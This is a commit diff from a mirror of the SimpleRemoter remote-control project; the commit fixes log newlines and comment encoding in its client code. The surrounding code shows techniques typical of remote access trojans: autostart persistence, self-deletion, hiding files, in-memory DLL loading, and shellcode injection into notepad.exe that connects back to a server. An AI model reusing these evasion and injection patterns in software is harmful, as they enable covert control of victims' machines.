admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-21 23:13:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Improvement: Add runasAdmin to client building options

Browse Source
This commit is contained in:
yuanyuanxiang
2025-12-12 20:33:33 +01:00
parent 93d6e730b8
commit 460f6c44bc
6 changed files with 108 additions and 92 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
client/ClientDll.cpp
View File

@@ -192,7 +192,7 @@ int main(int argc, const char *argv[])
if (r <= 0) {
BOOL s = self_del();
if (!IsDebug) {
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return r;
}
@@ -209,7 +209,7 @@ int main(int argc, const char *argv[])
Mprintf(" Arg [%d]: %s\n", i, argv[i]);
}
if (ret) {
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return 0x20251123;
}
@@ -222,7 +222,7 @@ int main(int argc, const char *argv[])
CloseHandle(hMutex);
hMutex = NULL;
#ifndef _DEBUG
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Sleep(1000);
return -2;
#endif
@@ -258,7 +258,7 @@ int main(int argc, const char *argv[])
status = E_STOP;
CloseHandle(hMutex);
Mprintf("结束运行.");
Mprintf("结束运行.\n");
Logger::getInstance().stop();
return 0;

54
client/test.cpp
View File

@@ -1,4 +1,4 @@

#include "StdAfx.h"
#include "MemoryModule.h"
#include "ShellcodeInj.h"
@@ -17,7 +17,7 @@ extern "C" {
#pragma comment(lib, "ws2_32.lib")
// <EFBFBD>Զ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
// 自动启动注册表中的值
#define REG_NAME "ClientDemo"
typedef void (*StopRun)();
@@ -26,13 +26,13 @@ typedef bool (*IsStoped)();
typedef BOOL (*IsExit)();
// ֹͣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 停止程序运行
StopRun stop = NULL;
// <EFBFBD>Ƿ<EFBFBD><EFBFBD>ɹ<EFBFBD>ֹͣ
// 是否成功停止
IsStoped bStop = NULL;
// <EFBFBD>Ƿ<EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>
// 是否退出被控端
IsExit bExit = NULL;
BOOL status = 0;
@@ -53,7 +53,7 @@ BOOL CALLBACK callback(DWORD CtrlType)
return TRUE;
}
// <EFBFBD><EFBFBD><EFBFBD>г<EFBFBD><EFBFBD><EFBFBD>.
// 运行程序.
BOOL Run(const char* argv1, int argv2);
// Package header.
@@ -77,16 +77,16 @@ protected:
HMEMORYMODULE m_mod;
std::string GetIPAddress(const char* hostName)
{
// 1. <EFBFBD>ж<EFBFBD><EFBFBD>Dz<EFBFBD><EFBFBD>ǺϷ<EFBFBD><EFBFBD><EFBFBD> IPv4 <EFBFBD><EFBFBD>ַ
// 1. 判断是不是合法的 IPv4 地址
sockaddr_in sa;
if (inet_pton(AF_INET, hostName, &(sa.sin_addr)) == 1) {
// <EFBFBD>ǺϷ<EFBFBD> IPv4 <EFBFBD><EFBFBD>ַ<EFBFBD><EFBFBD>ֱ<EFBFBD>ӷ<EFBFBD><EFBFBD><EFBFBD>
// 是合法 IPv4 地址,直接返回
return std::string(hostName);
}
// 2. <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Խ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 2. 否则尝试解析域名
addrinfo hints = {}, * res = nullptr;
hints.ai_family = AF_INET; // ֻ֧<EFBFBD><EFBFBD> IPv4
hints.ai_family = AF_INET; // 只支持 IPv4
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
@@ -210,22 +210,22 @@ public:
}
};
// @brief <EFBFBD><EFBFBD><EFBFBD>ȶ<EFBFBD>ȡsettings.ini<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡIP<EFBFBD>Ͷ˿<EFBFBD>.
// @brief 首先读取settings.ini配置文件获取IP和端口.
// [settings]
// localIp=XXX
// ghost=6688
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<EFBFBD>Ͷ˿<EFBFBD>.
// 如果配置文件不存在就从命令行中获取IP和端口.
int main(int argc, const char *argv[])
{
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %s %s. Arg Count: %d\n", argv[0], argc > 1 ? argv[1] : "", argc);
Mprintf("启动运行: %s %s. Arg Count: %d\n", argv[0], argc > 1 ? argv[1] : "", argc);
InitWindowsService({"ClientDemoService", "Client Demo Service", "Provide a demo service."}, Log);
bool isService = g_ConnectAddress.iStartup == Startup_TestRunMsc;
// ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 注册启动项
int r = RegisterStartup("Client Demo", "ClientDemo", !isService, g_ConnectAddress.runasAdmin, Logf);
if (r <= 0) {
BOOL s = self_del();
if (!IsDebug) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return r;
}
@@ -233,7 +233,7 @@ int main(int argc, const char *argv[])
BOOL ok = SetSelfStart(argv[0], REG_NAME);
if(!ok) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
Mprintf("设置开机自启动失败,请用管理员权限运行.\n");
}
if (isService) {
@@ -243,7 +243,7 @@ int main(int argc, const char *argv[])
Mprintf(" Arg [%d]: %s\n", i, argv[i]);
}
if (ret) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return 0x20251202;
}
@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
}
// <EFBFBD><EFBFBD> Shell code <EFBFBD><EFBFBD><EFBFBD>ӱ<EFBFBD><EFBFBD><EFBFBD>6543<EFBFBD>˿ڣ<EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD>±<EFBFBD>
// Shell code 连接本机6543端口注入到记事本
if (g_ConnectAddress.iStartup == Startup_InjSC) {
// Try to inject shell code to `notepad.exe`
// If failed then run memory DLL
@@ -289,7 +289,7 @@ int main(int argc, const char *argv[])
CloseHandle(hProcess);
Mprintf("Process [%d] is finished.\n", pid);
if (status == 1) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return -1;
}
@@ -305,21 +305,21 @@ int main(int argc, const char *argv[])
argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()),
argc > 2 ? atoi(argv[2]) : (g_ConnectAddress.ServerPort() == 0 ? 6543 : g_ConnectAddress.ServerPort()));
if (ret == 1) {
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
return -1;
}
} while (status == 0);
status = 0;
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.");
Mprintf("结束运行.\n");
Sleep(1000);
Logger::getInstance().stop();
return 0;
}
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD>: IP <20><> <20>˿<EFBFBD>.
// 传入命令行参数: IP 和 端口.
BOOL Run(const char* argv1, int argv2)
{
BOOL result = FALSE;
@@ -344,7 +344,7 @@ BOOL Run(const char* argv1, int argv2)
Mprintf("Error removing file. Error code: %d\n", GetLastError());
ok = FALSE;
} else {
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 设置文件属性为隐藏
if (SetFileAttributesA(oldFile.c_str(), FILE_ATTRIBUTE_HIDDEN)) {
Mprintf("File created and set to hidden: %s\n",oldFile.c_str());
}
@@ -377,7 +377,7 @@ BOOL Run(const char* argv1, int argv2)
bExit = hDll ? IsExit(runner->GetProcAddress(hDll, "IsExit")) : NULL;
if (NULL == run) {
if (hDll) runner->FreeLibrary(hDll);
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
Mprintf("加载动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError());
Sleep(3000);
delete runner;
return FALSE;
@@ -387,7 +387,7 @@ BOOL Run(const char* argv1, int argv2)
strcpy_s(ip, g_ConnectAddress.ServerIP());
int port = g_ConnectAddress.ServerPort();
strcpy(p + 1, "settings.ini");
if (_access(path, 0) == -1) { // <EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <20><><EFBFBD>ȴӲ<C8B4><D3B2><EFBFBD><EFBFBD><EFBFBD>ȡֵ<C8A1><D6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ǵ<EFBFBD>g_ConnectAddressȡֵ.
if (_access(path, 0) == -1) { // 文件不存在: 优先从参数中取值,其次是从g_ConnectAddress取值.
strcpy(ip, argv1);
port = argv2;
} else {
@@ -409,9 +409,9 @@ BOOL Run(const char* argv1, int argv2)
}
} while (result == 2);
if (!runner->FreeLibrary(hDll)) {
Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
Mprintf("释放动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError());
} else {
Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"<EFBFBD>ɹ<EFBFBD>!\n");
Mprintf("释放动态链接库\"ServerDll.dll\"成功!\n");
}
delete runner;
return result;